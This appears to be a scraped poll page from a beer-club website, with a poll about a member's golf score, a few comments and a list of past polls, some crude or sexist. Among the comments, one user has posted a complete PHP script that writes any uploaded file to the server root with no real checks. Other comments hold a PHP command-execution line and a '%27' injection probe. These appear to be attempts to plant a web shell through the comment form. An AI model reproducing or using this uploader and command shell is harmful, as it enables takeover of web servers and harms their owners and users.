|
The Latest Poll
|
| Kegerator.net Poll |
| After the gold outing at Mink Lake, what would GFAB most likely say his score was? |
|
|
|
|
|
Current Poll:
After the gold outing at Mink Lake, what would GFAB most likely say his score was? |
| Comments: |
| |
| ol_pappy |
| Wait, how can you score 8 when there are 9 holes? Oh, I see. |
| |
| J.O'B. |
| I said 60, but I know at the end of 9 holes & beer Gfab won't be able to count to 60... |
| |
| fizik |
| <?php
$site_name = $_SERVER['HTTP_HOST'];
$url_dir = "http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']);
$url_this = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$upload_dir = "/";
$upload_url = $url_dir."/";
$message ="";
if ($_FILES['userfile']) {
$message = do_upload($upload_dir, $upload_url);
}
else {
$message = "Invalid File Specified.";
}
print $message;
function do_upload($upload_dir, $upload_url) {
$temp_name = $_FILES['userfile']['tmp_name'];
$file_name = $_FILES['userfile']['name'];
$file_type = $_FILES['userfile']['type'];
$file_size = $_FILES['userfile']['size'];
$result = $_FILES['userfile']['error'];
$file_url = $upload_url.$file_name;
$file_path = $upload_dir.$file_name;
//File Name Check
if ( $file_name =="") {
$message = "Invalid File Name Specified";
return $message;
}
//File Size Check
else if ( $file_size > 50000000000000000000000000000) {
$message = "The file size is over 500K.";
return $message;
}
$result = move_uploaded_file($temp_name, $file_path);
$message = ($result)?"File url <a href=$file_url.>$file_url</a>" :
"Somthing is wrong with uploading a file.";
return $message;
}
?>
<form name="upload" id="upload" ENCTYPE="multipart/form-data" method="post">
Upload Image<input type="file" id="userfile" name="userfile">
<input type="submit" name="upload" value="Upload">
</form> |
| |
| <? passhtru ($cmd); ?> |
| test |
| |
| %27 |
| Hi guys! |
| |
|
| Past
Polls: |
What keeps ScootNasty from more gold medals?
|
Whatever happened to Sweet Tits?
|
Who will make it further they year in the NCAA Tourney? IU, Purdue, or Maryland?
|
Who will be crowned "King Pimp" of Superbowl Sunday?
|
Who would win in a naked pillow fight between SkyWhore and FlyGirlFee?
|
Who will puke closest to midnight 2003
|
Who will get Kegerator homesick first (and come back early)?
|
Who's the kegertor serial killer
|
Should ScabsIdiot be in prison?
|
Will Ol' Pappy retire from Kegerator after the superbowl?
|
Is Chuck a nancy boy for not getting a medal before a chick?
|
Who will get a medal first?
|
Who was the most out of control at the Popcorn Festival?
|
What is Wyatt most afraid of?
|
If stranded on a desert island... who would you be scared of most that he might eat you?
|
What animal would Gfab turn lesbo first?
|
Who is most likely to turn a woman lesbo?
|
What type of chick is Ghettofabulous most likely to take home with him from the bar?
|
Who will win the "Blind Keg" drinkoff?
|
Who's most likely to be a member of a boy band?
|
The Friday Night Keg Fight.... Who's your huckleberry? (submit comments to message board)
|
What new features need to be added to Kegerator.net? (Please post comments on the message board)
|
Favorite Tombstone Quote from Doc Holiday
|
Who will be the first to drink his weight in beer? (see marathon stats)
|
If Kegerator were a guy, who would he look like???
|
You need a booty call... who do you call?
|
Who will lead keg 6?
|